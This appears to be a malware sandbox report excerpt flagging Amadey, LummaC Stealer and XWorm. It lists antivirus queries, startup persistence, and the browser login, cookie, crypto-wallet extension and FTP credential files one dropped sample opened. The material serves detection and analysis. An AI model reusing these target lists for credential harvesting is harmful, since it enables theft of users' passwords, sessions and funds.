                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsma32.exe
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Amadey
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Amadeys stealer DLL
                          Source: Yara matchFile source: 5.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: e44fda3216.exe PID: 1608, type: MEMORYSTR
                          Yara detected XWorm
                          Source: Yara matchFile source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: NzL6O1Q.exe PID: 2112, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPED
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
